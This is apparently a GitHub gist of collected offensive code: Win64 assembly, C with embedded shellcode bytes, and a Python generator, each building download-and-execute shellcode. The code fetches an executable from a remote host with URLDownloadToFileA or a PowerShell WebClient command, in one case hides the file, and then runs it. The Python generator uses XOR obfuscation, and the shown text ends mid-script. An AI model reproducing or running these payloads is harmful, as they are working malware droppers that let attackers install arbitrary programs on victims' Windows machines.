Skip to content

Instantly share code, notes, and snippets.

@wildonion

wildonion/de64.asm

Created October 28, 2020 20:22
Show Gist options
  • Save wildonion/4815ef054511ffc0bb53c9185e7e078f to your computer and use it in GitHub Desktop.
Save wildonion/4815ef054511ffc0bb53c9185e7e078f to your computer and use it in GitHub Desktop.
Download ZIP
penetration testing tooling codes
Raw
de64.asm
;
; dexec64.asm - 218+ bytes (unoptimised)
;
; Win64 asm code, download & execute file using URLDownloadToFileA moniker & WinExec
;
; tested on AMD64 running Windows x64 SP1
;
; there probably are errors in the code, but this is more of an experimental source if nothing else.
; send corrections or errors to: 'weiss' wyse101 [at] gmail [dot] com
; code is not optimised at all, doesn't contain null bytes, so is possibly suitable for testing exploits on win64
;
; one of the main stumbling blocks in coding x64 asm on windows is the alignment of the stack.
; it must be aligned by 16 bytes because windows uses 128-bit SSE2, otherwise the api call will fail.
;
; thanx:
;
; roy g biv/29a - http://www.29a.net/
; Feryno - http://feryno.host.sk
; Tomasz Grysztar - http://flatassembler.org
;
format PE64 console 4.0
entry entrypoint
section '.text' code readable writeable executable ; assumed to be writeable when in memory, no NX obstruction!
; 1*8 is used rather than 0*8 because it uses null byte
LoadLibraryA equ rbp+1*8 ; using rbp is smaller than using ebp on 64-bit
WinExec equ rbp+2*8
URLDownloadToFileA equ rbp+3*8 ; must be rbp because of 64-bit URLMON base address
entrypoint:
jmp get_eip
load_dta:
pop rax
push rax
lea r15,[rax-(setup_stack-hashes)]
inc byte [rax-(setup_stack-url_end)] ; nullify tail end of url
inc byte [rax-(setup_stack-fname_end)] ; nullify end of filename
inc byte [rax-(setup_stack-url_mon_end)] ; nullify end of URLMON
ret ; go!
hashes:
dw 0bb86h ; LoadLibraryA() 635bbb86
dw 0a333h ; WinExec() 208da333
db 'URLMON',0ffh,0ffh
url_mon_end = $-2
dw 05f92h ; URLDownloadToFileA c91e5f92
dq -1
fname:
db 'trojan.exe',0ffh ; what to save as
fname_end = $-1
url:
db 'http://127.0.0.1:5000/static/mal.exe',0ffh ; where to download file from
url_end = $-1
get_eip:
call load_dta
setup_stack:
add rsp,-(4*8) ; 3 api variables, + 1 for avoiding null :-|
push rsp
pop rbp ; rbp = table of api
mov rdi,rbp ; rdi points to table also
stosq ; doesn't really do anything.
add rsp,-(11*8) ; reserve space for windows, when calling api
push 60h ; Hello, Ratter. 8-D
pop rcx
mov rax,[gs:rcx] ; Peb
mov rax,[rax+18h] ; PebLdr
mov rsi,[rax+30h] ; Ldr.InInitializationOrderModuleList
lodsq ; skip ntdll.dll
mov rbx,[rax+10h] ; kernel32.dll base
mov cl,2 ; get 2 api first
get_apis_loop:
mov eax,dword[rbx+3ch] ; MZ header size
lea rsi,[rbx+rax+78h] ; export directory begins at 88h
mov eax,dword[rsi+10h] ; extra instructions needed to avoid null bytes
lea rsi,[rbx+rax+1ch]
lodsd
lea r9,[rax+rbx]
lodsd
lea r10,[rax+rbx]
lodsd
lea r11,[rax+rbx]
xor r12,r12
load_index:
mov esi,dword[r10+4*r12]
add rsi,rbx
inc r12
xor eax,eax
cdq
hash_export:
lodsb
add edx,eax
rol edx, 5
dec eax
jns hash_export
ror edx, 5
cmp dx,word [r15] ; found api?
jne load_index
movzx edx,word [r11+2*r12-2]
mov eax,[r9+4*rdx]
add rax,rbx
add r15,2 ; skip hash
stosq ; save api address
loop get_apis_loop
push r15 ; push/pop to avoid null with mov
pop rcx
call qword[LoadLibraryA]
xchg rax,rbx
add r15,8 ; skip URLMON, first time.
push 1 ; get 1 api from URLMON
pop rcx
test rbx,rbx ; continue if not zero
jne get_apis_loop
dec ecx
push rbx
sub rsp,3*8 ; needed to align stack
xor r9,r9
mov r8,r15
lea rdx,[r8+(url-fname)]
call qword[URLDownloadToFileA]
push 1
pop rdx
mov rcx,r15
call qword[WinExec] ; WinExec("trojan.exe",SW_SHOWNORMAL??);
;jmp $ ; hang
call qword[ExitProcess] ; not required, testing only
; section below not required, simply for testing.
section '.idata' import data readable writeable
dd 0,0,0,RVA kernel_name,RVA kernel_table
dd 0,0,0,0,0
kernel_table:
ExitProcess dq RVA _ExitProcess
dq 0
kernel_name db 'KERNEL32.DLL',0
_ExitProcess dw 0
db 'ExitProcess',0
; July 2006 - (Ireland)
; milw0rm.com [2006-08-07]
Raw
de64_.c
/*
# Title : Windows x64 Download+Execute Shellcode
# Author : Roziul Hasan Khan Shifat
# Date : 24-11-2016
# size : 358 bytes
# Tested on : Windows 7 x64 Professional
# Email : [email protected]
*/
/*
section .text
global _start
_start:
;-----------------------------
sub rsp,88
lea r14,[rsp]
sub rsp,88
;------------------------------------------------
xor rdx,rdx
mov rax,[gs:rdx+0x60] ;PEB
mov rsi,[rax+0x18] ;PEB.Ldr
mov rsi,[rsi+0x10] ;PEB.Ldr->InMemOrderModuleList
lodsq
mov rsi,[rax]
mov rdi,[rsi+0x30] ;kernel32.dll base address
;---------------------------------------------------
mov ebx,[rdi+0x3c] ;elf_anew
add rbx,rdi
mov dl,0x88
mov ebx,[rbx+rdx]
add rbx,rdi
mov esi,[rbx+0x1c]
add rsi,rdi
;--------------------------------------------------
;loading urlmon.dll
mov dx,831
mov ebx,[rsi+rdx*4]
add rbx,rdi
xor rdx,rdx
mov [r14],dword 'urlm'
mov [r14+4],word 'on'
mov [r14+6],byte dl
lea rcx,[r14]
call rbx
mov dx,586
mov ebx,[rsi+rdx*4]
add rbx,rdi
xor rdx,rdx
mov rcx,'URLDownl'
mov [r14],rcx
mov rcx,'oadToFil'
mov [r14+8],rcx
mov [r14+16],word 'eA'
mov [r14+18],byte dl
lea rdx,[r14]
mov rcx,rax
call rbx
;;;;;;;;;;;;;;;;;;;;;;-------------------------------------
mov r15,rax
;------------------------------------------------
;save as 'C:\\Users\\Public\\p.exe' length: 24+1
mov rax,'C:\\User'
mov [r14],rax
mov rax,'s\\Publi'
mov [r14+8],rax
mov rax,'c\\p.exe'
mov [r14+16],rax
xor rdx,rdx
mov [r14+24],byte dl
;----------------------------------------
lea rcx,[r14+25]
;url "http://192.168.10.129/pl.exe" length: 28+1
mov rax,'http://1'
mov [rcx],rax
mov rax,'92.168.1'
mov [rcx+8],rax
mov rax,'0.129/pl'
mov [rcx+16],rax
mov [rcx+24],dword '.exe'
mov [rcx+28],byte dl
;---------------------------------------------------
sub rsp,88
download:
xor rcx,rcx
lea rdx,[r14+25]
lea r8,[r14]
xor r9,r9
mov [rsp+32],r9
call r15
xor rdx,rdx
cmp rax,rdx
jnz download
;------------------------------------------------
sub rsp,88
;-----------------------------------------------
;hiding file
mov dx,1131
mov ebx,[rsi+rdx*4]
add rbx,rdi ;SetFileAttributesA()
lea rcx,[r14]
xor rdx,rdx
mov dl,2
call rbx
;------------------------------------
;executing file
xor rdx,rdx
mov dx,1314
mov ebx,[rsi+rdx*4]
add rbx,rdi ;WinExec()
lea rcx,[r14]
xor rdx,rdx
call rbx
;------------------------------
xor rdx,rdx
mov dx,296
mov ebx,[rsi+rdx*4]
add rbx,rdi
;---------------------------------------
;if U use this shellcode for pe injection, then don't forget to free allocated space
add rsp,88
xor rcx,rcx
call rbx
*/
/*
Disassembly of section .text:
0000000000000000 <_start>:
0: 48 83 ec 58 sub $0x58,%rsp
4: 4c 8d 34 24 lea (%rsp),%r14
8: 48 83 ec 58 sub $0x58,%rsp
c: 48 31 d2 xor %rdx,%rdx
f: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax
14: 48 8b 70 18 mov 0x18(%rax),%rsi
18: 48 8b 76 10 mov 0x10(%rsi),%rsi
1c: 48 ad lods %ds:(%rsi),%rax
1e: 48 8b 30 mov (%rax),%rsi
21: 48 8b 7e 30 mov 0x30(%rsi),%rdi
25: 8b 5f 3c mov 0x3c(%rdi),%ebx
28: 48 01 fb add %rdi,%rbx
2b: b2 88 mov $0x88,%dl
2d: 8b 1c 13 mov (%rbx,%rdx,1),%ebx
30: 48 01 fb add %rdi,%rbx
33: 8b 73 1c mov 0x1c(%rbx),%esi
36: 48 01 fe add %rdi,%rsi
39: 66 ba 3f 03 mov $0x33f,%dx
3d: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
40: 48 01 fb add %rdi,%rbx
43: 48 31 d2 xor %rdx,%rdx
46: 41 c7 06 75 72 6c 6d movl $0x6d6c7275,(%r14)
4d: 66 41 c7 46 04 6f 6e movw $0x6e6f,0x4(%r14)
54: 41 88 56 06 mov %dl,0x6(%r14)
58: 49 8d 0e lea (%r14),%rcx
5b: ff d3 callq *%rbx
5d: 66 ba 4a 02 mov $0x24a,%dx
61: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
64: 48 01 fb add %rdi,%rbx
67: 48 31 d2 xor %rdx,%rdx
6a: 48 b9 55 52 4c 44 6f movabs $0x6c6e776f444c5255,%rcx
71: 77 6e 6c
74: 49 89 0e mov %rcx,(%r14)
77: 48 b9 6f 61 64 54 6f movabs $0x6c69466f5464616f,%rcx
7e: 46 69 6c
81: 49 89 4e 08 mov %rcx,0x8(%r14)
85: 66 41 c7 46 10 65 41 movw $0x4165,0x10(%r14)
8c: 41 88 56 12 mov %dl,0x12(%r14)
90: 49 8d 16 lea (%r14),%rdx
93: 48 89 c1 mov %rax,%rcx
96: ff d3 callq *%rbx
98: 49 89 c7 mov %rax,%r15
9b: 48 b8 43 3a 5c 5c 55 movabs $0x726573555c5c3a43,%rax
a2: 73 65 72
a5: 49 89 06 mov %rax,(%r14)
a8: 48 b8 73 5c 5c 50 75 movabs $0x696c6275505c5c73,%rax
af: 62 6c 69
b2: 49 89 46 08 mov %rax,0x8(%r14)
b6: 48 b8 63 5c 5c 70 2e movabs $0x6578652e705c5c63,%rax
bd: 65 78 65
c0: 49 89 46 10 mov %rax,0x10(%r14)
c4: 48 31 d2 xor %rdx,%rdx
c7: 41 88 56 18 mov %dl,0x18(%r14)
cb: 49 8d 4e 19 lea 0x19(%r14),%rcx
cf: 48 b8 68 74 74 70 3a movabs $0x312f2f3a70747468,%rax
d6: 2f 2f 31
d9: 48 89 01 mov %rax,(%rcx)
dc: 48 b8 39 32 2e 31 36 movabs $0x312e3836312e3239,%rax
e3: 38 2e 31
e6: 48 89 41 08 mov %rax,0x8(%rcx)
ea: 48 b8 30 2e 31 32 39 movabs $0x6c702f3932312e30,%rax
f1: 2f 70 6c
f4: 48 89 41 10 mov %rax,0x10(%rcx)
f8: c7 41 18 2e 65 78 65 movl $0x6578652e,0x18(%rcx)
ff: 88 51 1c mov %dl,0x1c(%rcx)
102: 48 83 ec 58 sub $0x58,%rsp
0000000000000106 <download>:
106: 48 31 c9 xor %rcx,%rcx
109: 49 8d 56 19 lea 0x19(%r14),%rdx
10d: 4d 8d 06 lea (%r14),%r8
110: 4d 31 c9 xor %r9,%r9
113: 4c 89 4c 24 20 mov %r9,0x20(%rsp)
118: 41 ff d7 callq *%r15
11b: 48 31 d2 xor %rdx,%rdx
11e: 48 39 d0 cmp %rdx,%rax
121: 75 e3 jne 106 <download>
123: 48 83 ec 58 sub $0x58,%rsp
127: 66 ba 6b 04 mov $0x46b,%dx
12b: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
12e: 48 01 fb add %rdi,%rbx
131: 49 8d 0e lea (%r14),%rcx
134: 48 31 d2 xor %rdx,%rdx
137: b2 02 mov $0x2,%dl
139: ff d3 callq *%rbx
13b: 48 31 d2 xor %rdx,%rdx
13e: 66 ba 22 05 mov $0x522,%dx
142: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
145: 48 01 fb add %rdi,%rbx
148: 49 8d 0e lea (%r14),%rcx
14b: 48 31 d2 xor %rdx,%rdx
14e: ff d3 callq *%rbx
150: 48 31 d2 xor %rdx,%rdx
153: 66 ba 28 01 mov $0x128,%dx
157: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
15a: 48 01 fb add %rdi,%rbx
15d: 48 83 c4 58 add $0x58,%rsp
161: 48 31 c9 xor %rcx,%rcx
164: ff d3 callq *%rbx
*/
#include<windows.h>
#include<stdio.h>
#include<string.h>
char shellcode[]=\
"\x48\x83\xec\x58\x4c\x8d\x34\x24\x48\x83\xec\x58\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x10\x48\xad\x48\x8b\x30\x48\x8b\x7e\x30\x8b\x5f\x3c\x48\x01\xfb\xb2\x88\x8b\x1c\x13\x48\x01\xfb\x8b\x73\x1c\x48\x01\xfe\x66\xba\x3f\x03\x8b\x1c\x96\x48\x01\xfb\x48\x31\xd2\x41\xc7\x06\x75\x72\x6c\x6d\x66\x41\xc7\x46\x04\x6f\x6e\x41\x88\x56\x06\x49\x8d\x0e\xff\xd3\x66\xba\x4a\x02\x8b\x1c\x96\x48\x01\xfb\x48\x31\xd2\x48\xb9\x55\x52\x4c\x44\x6f\x77\x6e\x6c\x49\x89\x0e\x48\xb9\x6f\x61\x64\x54\x6f\x46\x69\x6c\x49\x89\x4e\x08\x66\x41\xc7\x46\x10\x65\x41\x41\x88\x56\x12\x49\x8d\x16\x48\x89\xc1\xff\xd3\x49\x89\xc7\x48\xb8\x43\x3a\x5c\x5c\x55\x73\x65\x72\x49\x89\x06\x48\xb8\x73\x5c\x5c\x50\x75\x62\x6c\x69\x49\x89\x46\x08\x48\xb8\x63\x5c\x5c\x70\x2e\x65\x78\x65\x49\x89\x46\x10\x48\x31\xd2\x41\x88\x56\x18\x49\x8d\x4e\x19\x48\xb8\x68\x74\x74\x70\x3a\x2f\x2f\x31\x48\x89\x01\x48\xb8\x39\x32\x2e\x31\x36\x38\x2e\x31\x48\x89\x41\x08\x48\xb8\x30\x2e\x31\x32\x39\x2f\x70\x6c\x48\x89\x41\x10\xc7\x41\x18\x2e\x65\x78\x65\x88\x51\x1c\x48\x83\xec\x58\x48\x31\xc9\x49\x8d\x56\x19\x4d\x8d\x06\x4d\x31\xc9\x4c\x89\x4c\x24\x20\x41\xff\xd7\x48\x31\xd2\x48\x39\xd0\x75\xe3\x48\x83\xec\x58\x66\xba\x6b\x04\x8b\x1c\x96\x48\x01\xfb\x49\x8d\x0e\x48\x31\xd2\xb2\x02\xff\xd3\x48\x31\xd2\x66\xba\x22\x05\x8b\x1c\x96\x48\x01\xfb\x49\x8d\x0e\x48\x31\xd2\xff\xd3\x48\x31\xd2\x66\xba\x28\x01\x8b\x1c\x96\x48\x01\xfb\x48\x83\xc4\x58\x48\x31\xc9\xff\xd3";
int main()
{
int len=strlen(shellcode);
DWORD l=0;
printf("shellcode length : %d\n",len);
VirtualProtect(shellcode,len,PAGE_EXECUTE_READWRITE,&l);
(* (int(*)()) shellcode)();
return 0;
}
// https://www.exploit-db.com/shellcodes/46523
// unsigned char code[] = \
// "\xeb\x0c\x5e\x31\xc9\xb1\x19\xf6\x16\x46\xe2\xfb\xeb\x05\xe8\xef\xff\xff\xff\xce\x3f\xaf\x97\xd0\xd0\x8c\x97\x97\xd0\x9d\x96\x91\x76\x1c\xaf\x76\x1d\xac\x76\x1e\x4f\xf4\x32\x7f";
// int main()
// {
// int (*ret)() = (int(*)())code;
// ret();
// }
Raw
dex86.py
#Title: Obfuscated Shellcode Windows x64 Download And Execute [Use PowerShell] - Generator
#length: Dynamic ! depend on url and filename
#Date: 20 January 2015
#Author: Ali Razmjoo
#tested On: Windows 7 x64 ultimate
#WinExec => 0x769e2c91
#ExitProcess => 0x769679f8
#====================================
#Execute :
#powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exe', 'D:\Ali.exe')};D:\Ali.exe"
#====================================
#Ali Razmjoo , ['[email protected]','[email protected]']
#Thanks to my friends , Dariush Nasirpour and Ehsan Nezami
####################################################
#How it work ?
'''
C:\Users\Ali\Desktop>python "Windows x64 Download And Execute.py"
Enter url
Example: http://z3r0d4y.com/file.exe
Enter:http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exe
Enter filename
Example: D:\file.exe
Enter:D:\Ali_test.exe
C:\Users\Ali\Desktop>nasm -f elf shellcode.asm -o shellcode.o
C:\Users\Ali\Desktop>objdump -D shellcode.o
shellcode.o: file format elf32-i386
Disassembly of section .text:
00000000 <.text>:
0: 31 c0 xor %eax,%eax
2: 50 push %eax
3: b8 3f 02 02 65 mov $0x6502023f,%eax
8: bb 5a 7a 67 47 mov $0x47677a5a,%ebx
d: 31 d8 xor %ebx,%eax
f: 50 push %eax
10: b8 57 46 49 5d mov $0x5d494657,%eax
15: bb 32 35 3d 73 mov $0x733d3532,%ebx
1a: 31 d8 xor %ebx,%eax
1c: 50 push %eax
1d: b8 1c 08 39 3f mov $0x3f39081c,%eax
22: bb 70 61 66 4b mov $0x4b666170,%ebx
27: 31 d8 xor %ebx,%eax
29: 50 push %eax
2a: b8 22 54 3e 76 mov $0x763e5422,%eax
2f: bb 66 6e 62 37 mov $0x37626e66,%ebx
34: 31 d8 xor %ebx,%eax
36: 50 push %eax
37: b8 15 18 19 74 mov $0x74191815,%eax
3c: bb 32 31 64 4f mov $0x4f643132,%ebx
41: 31 d8 xor %ebx,%eax
43: 50 push %eax
44: b8 49 32 25 52 mov $0x52253249,%eax
49: bb 67 57 5d 37 mov $0x375d5767,%ebx
4e: 31 d8 xor %ebx,%eax
50: 50 push %eax
51: b8 1d 30 17 39 mov $0x3917301d,%eax
56: bb 69 55 64 4d mov $0x4d645569,%ebx
5b: 31 d8 xor %ebx,%eax
5d: 50 push %eax
5e: b8 34 0b 1d 14 mov $0x141d0b34,%eax
63: bb 75 67 74 4b mov $0x4b746775,%ebx
68: 31 d8 xor %ebx,%eax
6a: 50 push %eax
6b: b8 0a 27 5b 28 mov $0x285b270a,%eax
70: bb 2d 63 61 74 mov $0x7461632d,%ebx
75: 31 d8 xor %ebx,%eax
77: 50 push %eax
78: b8 2c 7e 62 65 mov $0x65627e2c,%eax
7d: bb 49 59 4e 45 mov $0x454e5949,%ebx
82: 31 d8 xor %ebx,%eax
84: 50 push %eax
85: b8 29 74 2c 29 mov $0x292c7429,%eax
8a: bb 50 5a 49 51 mov $0x51495a50,%ebx
8f: 31 d8 xor %ebx,%eax
91: 50 push %eax
92: b8 1f 00 11 1e mov $0x1e11001f,%eax
97: bb 6f 75 65 6a mov $0x6a65756f,%ebx
9c: 31 d8 xor %ebx,%eax
9e: 50 push %eax
9f: b8 3e 72 02 5f mov $0x5f02723e,%eax
a4: bb 46 4a 34 70 mov $0x70344a46,%ebx
a9: 31 d8 xor %ebx,%eax
ab: 50 push %eax
ac: b8 57 46 11 45 mov $0x45114657,%eax
b1: bb 38 32 62 6a mov $0x6a623238,%ebx
b6: 31 d8 xor %ebx,%eax
b8: 50 push %eax
b9: b8 23 24 1f 3b mov $0x3b1f2423,%eax
be: bb 42 54 6c 53 mov $0x536c5442,%ebx
c3: 31 d8 xor %ebx,%eax
c5: 50 push %eax
c6: b8 14 6c 40 03 mov $0x3406c14,%eax
cb: bb 78 41 33 6d mov $0x6d334178,%ebx
d0: 31 d8 xor %ebx,%eax
d2: 50 push %eax
d3: b8 1a 2f 00 02 mov $0x2002f1a,%eax
d8: bb 68 4a 72 67 mov $0x67724a68,%ebx
dd: 31 d8 xor %ebx,%eax
df: 50 push %eax
e0: b8 2f 23 6b 16 mov $0x166b232f,%eax
e5: bb 5b 5a 46 66 mov $0x66465a5b,%ebx
ea: 31 d8 xor %ebx,%eax
ec: 50 push %eax
ed: b8 5d 28 0c 26 mov $0x260c285d,%eax
f2: bb 72 58 79 52 mov $0x52795872,%ebx
f7: 31 d8 xor %ebx,%eax
f9: 50 push %eax
fa: b8 25 23 05 18 mov $0x18052325,%eax
ff: bb 4c 4e 6a 76 mov $0x766a4e4c,%ebx
104: 31 d8 xor %ebx,%eax
106: 50 push %eax
107: b8 30 7a 0d 17 mov $0x170d7a30,%eax
10c: bb 57 55 73 64 mov $0x64735557,%ebx
111: 31 d8 xor %ebx,%eax
113: 50 push %eax
114: b8 40 6a 1e 1a mov $0x1a1e6a40,%eax
119: bb 33 44 71 68 mov $0x68714433,%ebx
11e: 31 d8 xor %ebx,%eax
120: 50 push %eax
121: b8 0d 37 0b 31 mov $0x310b370d,%eax
126: bb 79 56 79 44 mov $0x44795679,%ebx
12b: 31 d8 xor %ebx,%eax
12d: 50 push %eax
12e: b8 42 36 37 24 mov $0x24373642,%eax
133: bb 6d 42 56 56 mov $0x5656426d,%ebx
138: 31 d8 xor %ebx,%eax
13a: 50 push %eax
13b: b8 47 3d 6e 49 mov $0x496e3d47,%eax
140: bb 33 4d 54 66 mov $0x66544d33,%ebx
145: 31 d8 xor %ebx,%eax
147: 50 push %eax
148: b8 6f 52 01 3f mov $0x3f01526f,%eax
14d: bb 47 75 69 4b mov $0x4b697547,%ebx
152: 31 d8 xor %ebx,%eax
154: 50 push %eax
155: b8 08 3a 22 5d mov $0x5d223a08,%eax
15a: bb 4e 53 4e 38 mov $0x384e534e,%ebx
15f: 31 d8 xor %ebx,%eax
161: 50 push %eax
162: b8 1e 1a 55 59 mov $0x59551a1e,%eax
167: bb 72 75 34 3d mov $0x3d347572,%ebx
16c: 31 d8 xor %ebx,%eax
16e: 50 push %eax
16f: b8 23 21 5a 16 mov $0x165a2123,%eax
174: bb 67 4e 2d 78 mov $0x782d4e67,%ebx
179: 31 d8 xor %ebx,%eax
17b: 50 push %eax
17c: b8 25 22 64 63 mov $0x63642225,%eax
181: bb 4b 56 4d 4d mov $0x4d4d564b,%ebx
186: 31 d8 xor %ebx,%eax
188: 50 push %eax
189: b8 09 07 39 31 mov $0x31390709,%eax
18e: bb 4a 6b 50 54 mov $0x54506b4a,%ebx
193: 31 d8 xor %ebx,%eax
195: 50 push %eax
196: b8 79 62 48 3f mov $0x3f486279,%eax
19b: bb 57 35 2d 5d mov $0x5d2d3557,%ebx
1a0: 31 d8 xor %ebx,%eax
1a2: 50 push %eax
1a3: b8 4f 21 36 49 mov $0x4936214f,%eax
1a8: bb 6f 6f 53 3d mov $0x3d536f6f,%ebx
1ad: 31 d8 xor %ebx,%eax
1af: 50 push %eax
1b0: b8 0b 20 14 20 mov $0x2014200b,%eax
1b5: bb 61 45 77 54 mov $0x54774561,%ebx
1ba: 31 d8 xor %ebx,%eax
1bc: 50 push %eax
1bd: b8 13 10 05 23 mov $0x23051013,%eax
1c2: bb 64 3d 4a 41 mov $0x414a3d64,%ebx
1c7: 31 d8 xor %ebx,%eax
1c9: 50 push %eax
1ca: b8 15 4b 1b 1d mov $0x1d1b4b15,%eax
1cf: bb 35 63 55 78 mov $0x78556335,%ebx
1d4: 31 d8 xor %ebx,%eax
1d6: 50 push %eax
1d7: b8 76 15 54 09 mov $0x9541576,%eax
1dc: bb 54 33 74 72 mov $0x72743354,%ebx
1e1: 31 d8 xor %ebx,%eax
1e3: 50 push %eax
1e4: b8 00 0f 10 66 mov $0x66100f00,%eax
1e9: bb 61 61 74 46 mov $0x46746161,%ebx
1ee: 31 d8 xor %ebx,%eax
1f0: 50 push %eax
1f1: b8 26 52 26 58 mov $0x58265226,%eax
1f6: bb 45 3d 4b 35 mov $0x354b3d45,%ebx
1fb: 31 d8 xor %ebx,%eax
1fd: 50 push %eax
1fe: b8 58 21 61 1b mov $0x1b612158,%eax
203: bb 34 4d 41 36 mov $0x36414d34,%ebx
208: 31 d8 xor %ebx,%eax
20a: 50 push %eax
20b: b8 4f 21 50 54 mov $0x5450214f,%eax
210: bb 3d 52 38 31 mov $0x3138523d,%ebx
215: 31 d8 xor %ebx,%eax
217: 50 push %eax
218: b8 09 1c 32 27 mov $0x27321c09,%eax
21d: bb 79 73 45 42 mov $0x42457379,%ebx
222: 31 d8 xor %ebx,%eax
224: 50 push %eax
225: 89 e0 mov %esp,%eax
227: bb 41 41 41 01 mov $0x1414141,%ebx
22c: c1 eb 08 shr $0x8,%ebx
22f: c1 eb 08 shr $0x8,%ebx
232: c1 eb 08 shr $0x8,%ebx
235: 53 push %ebx
236: 50 push %eax
237: bb 91 2c c6 75 mov $0x75c62c91,%ebx
23c: ff d3 call *%ebx
23e: bb f8 79 be 75 mov $0x75be79f8,%ebx
243: ff d3 call *%ebx
#you have your shellcode now; dump it using below command:
# objdump -d ./shellcode.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
=======================================
shellcode.c
#include <stdio.h>
#include <string.h>
int main(){
unsigned char shellcode[]= "\x31\xc0\x50\xb8\x3f\x02\x02\x65\xbb\x5a\x7a\x67\x47\x31\xd8\x50\xb8\x57\x46\x49\x5d\xbb\x32\x35\x3d\x73\x31\xd8\x50\xb8\x1c\x08\x39\x3f\xbb\x70\x61\x66\x4b\x31\xd8\x50\xb8\x22\x54\x3e\x76\xbb\x66\x6e\x62\x37\x31\xd8\x50\xb8\x15\x18\x19\x74\xbb\x32\x31\x64\x4f\x31\xd8\x50\xb8\x49\x32\x25\x52\xbb\x67\x57\x5d\x37\x31\xd8\x50\xb8\x1d\x30\x17\x39\xbb\x69\x55\x64\x4d\x31\xd8\x50\xb8\x34\x0b\x1d\x14\xbb\x75\x67\x74\x4b\x31\xd8\x50\xb8\x0a\x27\x5b\x28\xbb\x2d\x63\x61\x74\x31\xd8\x50\xb8\x2c\x7e\x62\x65\xbb\x49\x59\x4e\x45\x31\xd8\x50\xb8\x29\x74\x2c\x29\xbb\x50\x5a\x49\x51\x31\xd8\x50\xb8\x1f\x00\x11\x1e\xbb\x6f\x75\x65\x6a\x31\xd8\x50\xb8\x3e\x72\x02\x5f\xbb\x46\x4a\x34\x70\x31\xd8\x50\xb8\x57\x46\x11\x45\xbb\x38\x32\x62\x6a\x31\xd8\x50\xb8\x23\x24\x1f\x3b\xbb\x42\x54\x6c\x53\x31\xd8\x50\xb8\x14\x6c\x40\x03\xbb\x78\x41\x33\x6d\x31\xd8\x50\xb8\x1a\x2f\x00\x02\xbb\x68\x4a\x72\x67\x31\xd8\x50\xb8\x2f\x23\x6b\x16\xbb\x5b\x5a\x46\x66\x31\xd8\x50\xb8\x5d\x28\x0c\x26\xbb\x72\x58\x79\x52\x31\xd8\x50\xb8\x25\x23\x05\x18\xbb\x4c\x4e\x6a\x76\x31\xd8\x50\xb8\x30\x7a\x0d\x17\xbb\x57\x55\x73\x64\x31\xd8\x50\xb8\x40\x6a\x1e\x1a\xbb\x33\x44\x71\x68\x31\xd8\x50\xb8\x0d\x37\x0b\x31\xbb\x79\x56\x79\x44\x31\xd8\x50\xb8\x42\x36\x37\x24\xbb\x6d\x42\x56\x56\x31\xd8\x50\xb8\x47\x3d\x6e\x49\xbb\x33\x4d\x54\x66\x31\xd8\x50\xb8\x6f\x52\x01\x3f\xbb\x47\x75\x69\x4b\x31\xd8\x50\xb8\x08\x3a\x22\x5d\xbb\x4e\x53\x4e\x38\x31\xd8\x50\xb8\x1e\x1a\x55\x59\xbb\x72\x75\x34\x3d\x31\xd8\x50\xb8\x23\x21\x5a\x16\xbb\x67\x4e\x2d\x78\x31\xd8\x50\xb8\x25\x22\x64\x63\xbb\x4b\x56\x4d\x4d\x31\xd8\x50\xb8\x09\x07\x39\x31\xbb\x4a\x6b\x50\x54\x31\xd8\x50\xb8\x79\x62\x48\x3f\xbb\x57\x35\x2d\x5d\x31\xd8\x50\xb8\x4f\x21\x36\x49\xbb\x6f\x6f\x53\x3d\x31\xd8\x50\xb8\x0b\x20\x14\x20\xbb\x61\x45\x77\x54\x31\xd8\x50\xb8\x13\x10\x05\x23\xbb\x64\x3d\x4a\x41\x31\xd8\x50\xb8\x15\x4b\x1b\x1d\xbb\x35\x63\x55\x78\x31\xd8\x50\xb8\x76\x15\x54\x09\xbb\x54\x33\x74\x72\x31\xd8\x50\xb8\x00\x0f\x10\x66\xbb\x61\x61\x74\x46\x31\xd8\x50\xb8\x26\x52\x26\x58\xbb\x45\x3d\x4b\x35\x31\xd8\x50\xb8\x58\x21\x61\x1b\xbb\x34\x4d\x41\x36\x31\xd8\x50\xb8\x4f\x21\x50\x54\xbb\x3d\x52\x38\x31\x31\xd8\x50\xb8\x09\x1c\x32\x27\xbb\x79\x73\x45\x42\x31\xd8\x50\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\x91\x2c\xc6\x75\xff\xd3\xbb\xf8\x79\xbe\x75\xff\xd3";
fprintf(stdout,"Length: %d\n\n",strlen(shellcode));
(*(void(*)()) shellcode)();
}
=======================================
C:\Users\Ali\Desktop>gcc shellcode.c -o shellcode.exe
C:\Users\Ali\Desktop>shellcode.exe
Length: 148
C:\Users\Ali\Desktop>
#notice : when program exit, you must wait 2-3 second , it will finish download and execute file after 2-3 second
'''
import random,binascii
chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz123456789=[]-'
p1 = '''xor eax,eax
push eax
'''
p2 = '''
mov eax,esp
mov ebx,0x01414141
shr ebx,0x08
shr ebx,0x08
shr ebx,0x08
push ebx
push eax
mov ebx,0x75c62c91
call ebx
mov ebx,0x75be79f8
call ebx
'''
sen1 = str(raw_input('Enter url\nExample: http://z3r0d4y.com/file.exe \nEnter:'))
sen1 = sen1.rsplit()
sen1 = sen1[0]
sen2 = str(raw_input('Enter filename\nExample: D:\\file.exe\nEnter:'))
sen2 = sen2.rsplit()
sen2 = sen2[0]
sen = '''powershell -command "& { (New-Object Net.WebClient).DownloadFile('%s', '%s')};%s"''' %(sen1,sen2,sen2)
m = 0
for word in sen:
m += 1
m = m - 1
stack = ''
while(m>=0):
stack += sen[m]
m -= 1
stack = stack.encode('hex')
skip = 1
if len(stack) % 8 == 0:
skip = 0
if skip is 1:
